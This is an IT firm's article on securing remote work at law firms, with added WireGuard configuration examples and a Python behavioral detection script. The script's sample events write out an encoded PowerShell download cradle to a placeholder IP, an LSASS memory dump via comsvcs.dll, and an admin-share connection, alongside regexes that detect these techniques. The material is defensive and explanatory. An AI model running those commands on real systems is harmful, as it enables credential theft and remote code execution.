Remote Work Security for Legal Professionals

by Jon Lober | NOC Technology

Protecting Client Data Outside the Office

Your paralegal is reviewing case files from a coffee shop. A partner is finishing a brief from their home office. An associate is taking a client call from an airport lounge. Remote and hybrid work isn't a pandemic holdover anymore; it's how law firms operate in 2026. But every location outside your office is a potential exposure point for client data, and the ethics rules don't care where you're sitting when a breach happens.


The ABA Model Rules require lawyers to take "competent and reasonable measures" to safeguard client information. That obligation follows your team wherever they work. When 20% of law firms experienced a cyberattack in the past year, with 39% of those incidents resulting in data loss or exposure, remote work security isn't optional. It's the foundation of ethical practice.


Here's what your firm needs to consider when attorneys and staff work outside the office.


The Ethics Obligation Doesn't Change With Your Location


Missouri attorneys, like their counterparts across the country, have an ethical duty to understand and implement reasonable cybersecurity measures. This isn't buried in some obscure guidance; it's built into the rules governing competent representation. Rule 1.1, through its Comment 8, requires technological competence: keeping abreast of the benefits and risks of the technology you use to practice. Rule 1.6(c) requires reasonable efforts to prevent unauthorized disclosure of, or unauthorized access to, information relating to a representation. Rule 1.15 extends protection to client property, including digital files.


When your team works remotely, these obligations get harder to meet. You can't control the network security at someone's home. You can't verify that the coffee shop WiFi isn't being monitored. You can't physically see whether someone's screen is visible to strangers. But the bar doesn't accept "they were working from home" as an excuse when client data gets exposed.


The practical implication: your firm needs documented policies and technical controls that travel with your people. If an attorney can access case files from anywhere, your security posture needs to protect those files everywhere.


Home Networks Are Not Enterprise Networks


Most residential internet setups were designed for streaming movies, not handling privileged legal communications. The average home network runs on a consumer-grade router with default settings, no network segmentation, and whatever devices the household happens to own: smart TVs, gaming consoles, kids' tablets, IoT devices with known vulnerabilities.


When an attorney connects their work laptop to that network, they're sharing bandwidth and potentially exposure with every other device in the house. A compromised smart speaker or an unpatched home computer creates lateral movement opportunities that wouldn't exist in a properly segmented office network.


The solution isn't banning remote work; that ship has sailed. The solution is ensuring that remote connections don't depend on home network security. A full-tunnel VPN that encrypts all traffic, DNS lookups included, back to your firm's infrastructure, or zero-trust network access that verifies the device and the user before they reach any application, takes the home router and everything plugged into it out of the path. Two caveats a practitioner will want: a split-tunnel VPN that only routes firm subnets still sends the rest of the laptop's traffic, including cloud applications, through the home network; and an encrypted tunnel does nothing about a compromised device on the same LAN probing the laptop itself, so the host firewall should treat every non-office network as untrusted and block inbound connections.


For firms in the Greater St. Louis area, we've seen this play out repeatedly: a firm assumes their attorneys' home setups are "good enough," then discovers after an incident that someone's compromised home device was the entry point. The technology exists to prevent this. The question is whether your firm has implemented it.


Public WiFi Is Exactly As Dangerous As You've Heard


Yes, HTTPS encrypts website traffic. No, that doesn't make coffee shop WiFi safe for legal work. Plain DNS queries reveal every domain your laptop resolves. The hostnames and addresses of the systems you connect to are visible even when the content is encrypted. A rogue access point can present a captive portal that looks like the venue's sign-in page and is really a credential-harvesting form, and it can intercept or downgrade any connection that isn't strictly HTTPS. And that assumes the "FreeStarbucksWiFi" network is actually operated by Starbucks and not someone sitting in the corner with a laptop broadcasting the same name.


The real risk isn't necessarily that an attacker will intercept a specific privileged document in transit. It's that they'll capture credentials, session tokens, or other access materials, whether by sniffing a connection that wasn't encrypted or by proxying a login page, that let them get into your systems later, from anywhere. One captured session cookie can give an attacker the same access to your document management system that your associate has, for as long as that session stays valid, and a password reset alone does not end it unless you also terminate active sessions.


The fix is straightforward: never connect to firm resources over public WiFi without a VPN or zero-trust client, and configure it as always-on so the tunnel is up before any firm application opens and nobody has to make a judgment call. Better yet, provide cellular hotspots or tethering plans for attorneys who regularly work outside the office. The cost of a mobile data plan is negligible compared to the cost of a breach investigation, client notification, and malpractice exposure.
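What "encrypt all traffic back to the firm" actually looks like in a client configuration, as an added illustration that is not from the original page (the page names no VPN product; WireGuard is assumed here, and the 10.40.0.0/16 range, the resolver address, and the gateway hostname are placeholders). The first profile is a split tunnel that carries only the firm's subnets; the second is the full-tunnel form the two sections above call for.

```ini
# Profile 1 (WEAK): split tunnel. Only 10.40.0.0/16, the firm's network, enters the tunnel.
# Web browsing, the cloud DMS, email, and every DNS lookup still leave through the
# home or coffee-shop router, where they can be observed or redirected.
[Interface]
PrivateKey = <client private key, generated per device>
Address = 10.40.200.12/32

[Peer]
PublicKey = <firm gateway public key>
Endpoint = vpn.example-firm.com:51820
AllowedIPs = 10.40.0.0/16

# Profile 2 (CORRECTED): full tunnel. All IPv4 and IPv6 traffic is routed to the firm
# gateway, and DNS is answered by a resolver behind the tunnel, so the local network
# sees nothing but one encrypted UDP stream to the gateway.
[Interface]
PrivateKey = <client private key, generated per device>
Address = 10.40.200.12/32
DNS = 10.40.0.53

[Peer]
PublicKey = <firm gateway public key>
Endpoint = vpn.example-firm.com:51820
AllowedIPs = 0.0.0.0/0, ::/0
PersistentKeepalive = 25
```

The `::/0` entry matters: without it, IPv6 traffic (which many home and venue networks hand out) bypasses the tunnel entirely. Two things this configuration does not do on its own: it does not block traffic while the tunnel is down, which is the job of the client's always-on or "kill switch" setting, and it does not protect the laptop from a compromised device on the same LAN, which is the job of the host firewall treating every non-office network as public.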


Device Security Matters More When Devices Travel


A desktop computer in a locked office faces a limited threat profile. A laptop that travels to homes, airports, hotels, and client meetings faces every threat profile. Physical theft, shoulder surfing, loss, and unattended access all become real possibilities.


Full disk encryption is table stakes: if a device is stolen, the data should be unreadable. That means BitLocker or FileVault enforced by policy, with recovery keys escrowed in your management platform rather than in a file on the laptop. But encryption only helps if the device is actually locked; a logged-in laptop left open hands an attacker decrypted data. Automatic screen locks after brief inactivity (two to five minutes maximum), requiring the password or biometric to resume, prevent opportunistic access when an attorney steps away. Remote wipe capabilities let you render a lost device harmless before it becomes a breach, provided the device was enrolled in management before it went missing.


Equally important is controlling what lives on the device in the first place. Even when your document management system is cloud-based and attorneys work through a browser or a synced application, a stolen laptop can hold cached or synced copies of recent documents, downloaded email attachments, and offline mailbox files. Policies about local file storage, combined with technical controls that limit offline access and sync, reduce exposure when devices go missing.


Mobile devices compound the challenge. Attorneys read emails, review documents, and communicate with clients from phones and tablets. These devices need the same security controls as laptops: encryption, strong authentication, remote wipe, and managed applications that keep firm data segregated from personal use.


Authentication Is Your First and Last Defense


Passwords alone haven't been adequate for years, and remote work makes their weaknesses more acute. Credential stuffing attacks, where attackers use username/password combinations leaked from other breaches, work just as well whether you're in the office or at home. Phishing attacks designed to capture login credentials can reach attorneys anywhere they check email.


Multi-factor authentication turns a stolen password from complete access into a useless string. When your document management system, email, and practice management software all require a second factor (an authenticator app, a hardware key, or a push notification to a registered device), a compromised password alone can't get attackers in. Note the word alone: a real-time phishing page that relays the one-time code within its validity window, or a push "fatigue" campaign that nags a user into tapping Approve, defeats the weaker forms of MFA, which is why the choice of factor matters.


The implementation matters. SMS-based codes are better than nothing but vulnerable to SIM swapping attacks. Authenticator apps are stronger, though a code typed into a convincing fake login page still works for the attacker for the rest of its 30-second window. Hardware security keys using FIDO2/WebAuthn (and passkeys, which build on the same standard) are strongest, because the key only signs for the genuine site's origin and a phishing domain gets nothing it can reuse. For a small or mid-sized firm in the STL area, authenticator apps hit the practical sweet spot: meaningful security improvement without the logistics of distributing and managing physical tokens, with hardware keys reserved for the accounts that matter most, such as partners, finance, and IT administrators.


The critical point is coverage. MFA on your email but not your document management system leaves a gap. MFA on cloud services but not your VPN leaves a gap. And MFA on the login page while legacy protocols (IMAP, POP, SMTP basic authentication, older ActiveSync) remain enabled leaves the widest gap of all, because those paths accept a password and nothing else. Every system that touches client data needs the same authentication rigor, and the paths around the login page need to be closed.


Endpoint Detection Has Replaced Traditional Antivirus


Traditional antivirus software looks for known malware signatures: patterns that match previously identified threats. That worked when threats evolved slowly and attackers reused the same tools. It doesn't work when malware is automatically repacked, increasingly with AI assistance, into a unique variant for every target, and when attackers use legitimate system tools such as PowerShell, WMI, and built-in administrative utilities ("living off the land") that no signature will ever flag.


Modern endpoint detection and response (EDR) solutions take a different approach. Instead of looking for known bad files, they monitor system behavior for suspicious patterns: unusual process chains, unexpected network connections, attempts to access credential stores, lateral movement between systems. When something looks wrong, they can isolate the affected device before damage spreads.
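As an added example, not the page's own and not any particular EDR product's logic, here is a small Python detector that applies behavioral rules of the kind described above to constructed endpoint telemetry. The event format is a simplified shape invented for this example, loosely modeled on process-creation, process-access, and network-connection records; the hostname, the file server name, and the 203.0.113.10 address are documentation placeholders, and the encoded PowerShell payload is built inline so the decoding rule has something real to decode.

```python
import base64
import re
from dataclasses import dataclass

# Added example: behavioral rules of the kind an EDR applies, run over constructed
# telemetry. The event shape is invented for this demo, not a real product export.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
LSASS_READERS_OK = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE_RE = re.compile(r"iex|invoke-expression|downloadstring|net\.webclient|frombase64string", re.I)
LSASS_DUMP_RE = re.compile(r"comsvcs\.dll.*minidump|procdump.*lsass", re.I)
LATERAL_RE = re.compile(r"\\\\[\w.-]+\\(?:c\$|admin\$)|psexec|wmic\s.*process\s+call\s+create|sc\s+\\\\", re.I)
SEVERITY = {"office_spawns_script_host": "medium", "encoded_powershell_download_cradle": "high",
            "credential_store_access": "high", "lsass_dump_attempt": "high",
            "script_host_network": "medium", "lateral_movement_tooling": "high"}


@dataclass
class Alert:
    rule: str
    host: str
    detail: str


def decode_encoded_command(cmdline: str):
    """PowerShell -EncodedCommand is base64 of UTF-16LE text; decode it, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(events: list) -> list:
    """Apply each behavioral rule to each event; return alerts in event order."""
    alerts = []
    for ev in events:
        host, kind = ev.get("host", "?"), ev.get("event")
        if kind == "process_create":
            parent, image, cmd = ev["parent"].lower(), ev["image"].lower(), ev.get("cmdline", "")
            # Unusual process chain: a document viewer should never launch a script host.
            if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
                alerts.append(Alert("office_spawns_script_host", host, f"{parent} -> {image}"))
            # Decode obfuscated PowerShell and look for a download-and-execute cradle.
            decoded = decode_encoded_command(cmd) if image in ("powershell.exe", "pwsh.exe") else None
            if decoded and CRADLE_RE.search(decoded):
                alerts.append(Alert("encoded_powershell_download_cradle", host, decoded[:60]))
            if LSASS_DUMP_RE.search(cmd):  # writing LSASS memory to disk
                alerts.append(Alert("lsass_dump_attempt", host, cmd))
            if LATERAL_RE.search(cmd):  # admin shares, PsExec, WMI/sc remote execution
                alerts.append(Alert("lateral_movement_tooling", host, cmd))
        elif kind == "process_access" and ev.get("target", "").lower() == "lsass.exe":
            # Credential store access: anything but the OS itself opening LSASS memory.
            src = ev.get("source", "").lower()
            if src not in LSASS_READERS_OK:
                alerts.append(Alert("credential_store_access", host, f"{src} opened lsass.exe, access {ev.get('access')}"))
        elif kind == "network_connect" and ev.get("image", "").lower() in SCRIPT_HOSTS:
            # Unexpected network connection: script engines rarely need the internet.
            alerts.append(Alert("script_host_network", host, f"{ev['image']} -> {ev['dest']}:{ev['port']}"))
    return alerts


def should_isolate(alerts: list) -> bool:
    """Containment decision: any high-severity rule firing isolates the host from the network."""
    return any(SEVERITY[a.rule] == "high" for a in alerts)


def sample_events() -> list:
    """Constructed telemetry for one laptop: three benign events, then a phishing
    document that runs PowerShell, dumps LSASS, and reaches for a file server."""
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')"
    enc = base64.b64encode(cradle.encode("utf-16le")).decode()
    h = "LT-ASSOC01"
    return [
        {"host": h, "event": "process_create", "parent": "explorer.exe", "image": "chrome.exe", "cmdline": "chrome.exe"},
        {"host": h, "event": "network_connect", "image": "chrome.exe", "dest": "203.0.113.10", "port": 443},
        {"host": h, "event": "process_create", "parent": "outlook.exe", "image": "winword.exe",
         "cmdline": 'winword.exe /n "Retainer_Agreement.docm"'},
        {"host": h, "event": "process_create", "parent": "winword.exe", "image": "powershell.exe",
         "cmdline": f"powershell.exe -nop -w hidden -enc {enc}"},
        # 0x1010 = PROCESS_VM_READ | PROCESS_QUERY_LIMITED_INFORMATION, the usual dumping mask.
        {"host": h, "event": "process_access", "source": "powershell.exe", "target": "lsass.exe", "access": "0x1010"},
        {"host": h, "event": "process_create", "parent": "powershell.exe", "image": "rundll32.exe",
         "cmdline": r"rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 712 C:\Users\Public\l.dmp full"},
        {"host": h, "event": "network_connect", "image": "powershell.exe", "dest": "203.0.113.10", "port": 443},
        {"host": h, "event": "process_create", "parent": "powershell.exe", "image": "net.exe",
         "cmdline": r"net use \\FS01\C$ /user:FIRM\jdoe"},
    ]


if __name__ == "__main__":
    found = detect(sample_events())
    for a in found:
        print(f"[{SEVERITY[a.rule]:6}] {a.host} {a.rule}: {a.detail}")
    print("isolate host:", should_isolate(found))
```

None of these rules cares about a file hash. The Word document could be unique to this one target and the PowerShell payload freshly generated, and the chain would still light up at the first step (Word launching PowerShell), long before the credential theft and the attempt at the file server. That is the difference between signatures and behavior, and why the isolation decision can be made in minutes rather than after the next signature update.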


For remote devices, this monitoring becomes essential. Your IT team (or your managed IT provider) can't watch what's happening on a laptop in someone's living room the way they might notice something odd on the office network. EDR extends that visibility to every managed device, wherever it connects from.


The practical benefit: when an attorney clicks a malicious link in a convincing phishing email (and eventually, someone will), the response can be measured in minutes rather than days. The difference between a contained incident and a reportable breach often comes down to detection speed.


Training Your Team Is Not Optional


Technical controls fail when humans circumvent them. The attorney who finds the VPN slow and connects directly "just this once." The paralegal who emails documents to a personal account to print at home. The staff member who uses the same password everywhere because remembering multiple passwords is annoying.


Regular security awareness training transforms your team from a vulnerability into a defense layer. When everyone understands why the controls exist, not just what the rules are but what happens when they're ignored, compliance improves. When they can recognize phishing attempts, social engineering calls, and suspicious requests, they become early warning sensors rather than attack vectors.


The training doesn't need to be elaborate. Short, frequent sessions work better than annual marathon presentations that everyone forgets. Simulated phishing exercises identify who needs additional attention. Clear reporting procedures let people raise concerns when something seems wrong.


For Missouri law firms, this training should include state-specific ethics context. When attorneys understand that a security incident isn't just a technical problem but a potential bar complaint, the stakes become personal.


Building a Remote Work Security Policy

Individual controls matter, but they need to connect into a coherent policy that your firm can actually enforce.


Your policy should address:

  • What devices can access firm resources, and what security baselines they must meet (encryption, screen lock, EDR, patch level)
  • Whether personal devices are permitted, and if so, what management and monitoring applies
  • How remote connections are made: VPN or zero-trust client required, and no firm access over public WiFi without it
  • How different types of data should be handled; some matters may warrant stricter controls than others
  • Incident reporting procedures, so security events (a lost device, a suspected phishing click) get escalated rather than hidden


The policy needs buy-in from leadership. When partners ignore security requirements because they find them inconvenient, the message to everyone else is clear. When leadership visibly follows the same rules, compliance becomes cultural.


Document the policy, train on it, and review it annually. Security threats evolve, your firm's technology changes, and what worked two years ago may have gaps today.


What This Looks Like in Practice


A Missouri firm with 15 attorneys and remote work arrangements might implement:

  • Managed laptops with full disk encryption and EDR software
  • VPN or zero-trust network access for all remote connections
  • MFA on email, document management, and practice management systems
  • A mobile device management solution for phones and tablets accessing firm email
  • Quarterly security awareness training with monthly phishing simulations
  • A documented policy covering all of the above, reviewed annually


That's not a hypothetical list; it's what firms we work with in the Greater St. Louis area have implemented. The cost is manageable (roughly $150-$250 per user per month depending on scope), and the alternative, hoping nothing bad happens, is increasingly unrealistic given current threat levels.


Conclusion


Remote work security isn't a technology project you finish and forget. It's an ongoing operational requirement driven by your ethical obligations to clients and the practical reality that attackers specifically target law firms for the valuable data they hold. The firms that treat security as foundational, building it into how remote work happens rather than bolting it on afterward, are the ones that avoid becoming breach statistics.


The first step is honest assessment: does your current remote work setup meet your ethics obligations, or are you hoping for the best? If you're not sure, that's the answer.


Curious what proper remote work security costs for a firm your size? We publish our pricing because we think you deserve to know what IT costs before you pick up the phone.

Frequently Asked Questions

Can attorneys ethically work from home on client matters?
Yes, but only with appropriate security measures in place. The ABA Model Rules require lawyers to take reasonable steps to protect client information regardless of work location. This means implementing controls like VPNs, encrypted devices, and multi-factor authentication that maintain the same security standard you'd have in the office.
What's the biggest remote work security risk for law firms?
Credential theft remains the primary threat. Attackers use phishing emails and compromised websites to capture login credentials, then use those credentials to access firm systems from anywhere. Multi-factor authentication is the most effective control because it makes stolen passwords useless without the second factor.
Should our firm allow attorneys to use personal devices for work?
It depends on your risk tolerance and your ability to manage those devices. Personal devices accessing client data should have minimum security requirements (encryption, screen locks, remote wipe capability) and ideally run mobile device management software that keeps firm data segregated. Many St. Louis firms find it simpler to provide firm-owned devices with consistent security baselines.
How often should we train staff on remote work security?
Short, frequent training works better than annual marathons. Most firms see better results with quarterly focused sessions (15-30 minutes) supplemented by monthly phishing simulations. This keeps security awareness current without overwhelming staff or becoming background noise they tune out.
Is a VPN necessary if we use cloud-based practice management software?
VPNs and cloud security serve different purposes. A cloud application's own TLS protects data in transit to that one service, and its authentication controls who gets in. A VPN or zero-trust client protects all traffic from a device, including DNS lookups, connections to on-premise systems and internal resources, and anything that isn't itself encrypted, and it lets you restrict firm systems to connections that come from managed devices. For most firms, both make sense as complementary controls.
What should we do if a remote employee's laptop is stolen?
Immediately trigger remote wipe (or at minimum a remote lock) if that capability is configured, and confirm the device acknowledged the command. Revoke the device's active sessions and tokens in your identity provider and cloud services, then reset the passwords for accounts used on it; a password reset alone does not invalidate a session still cached on the laptop. Review your document management and sync logs to determine which files had been opened or synced to that device, since those are what could have been cached locally. Confirm that full disk encryption was enabled and its recovery key is escrowed, because whether the data was encrypted typically determines whether state breach notification duties apply. Document the incident, including the timeline and what was on the device, for potential ethics reporting requirements. If the device held unencrypted client data, you may have notification obligations depending on the data and the matter involved.
How much does proper remote work security cost for a small law firm?
For a firm with 10-25 users, comprehensive remote work security (managed devices, EDR, VPN or zero-trust access, MFA, training) typically runs $150-$250 per user per month through a managed IT provider. That includes the technology, monitoring, and support. The cost scales down per-user as firm size increases due to shared infrastructure costs.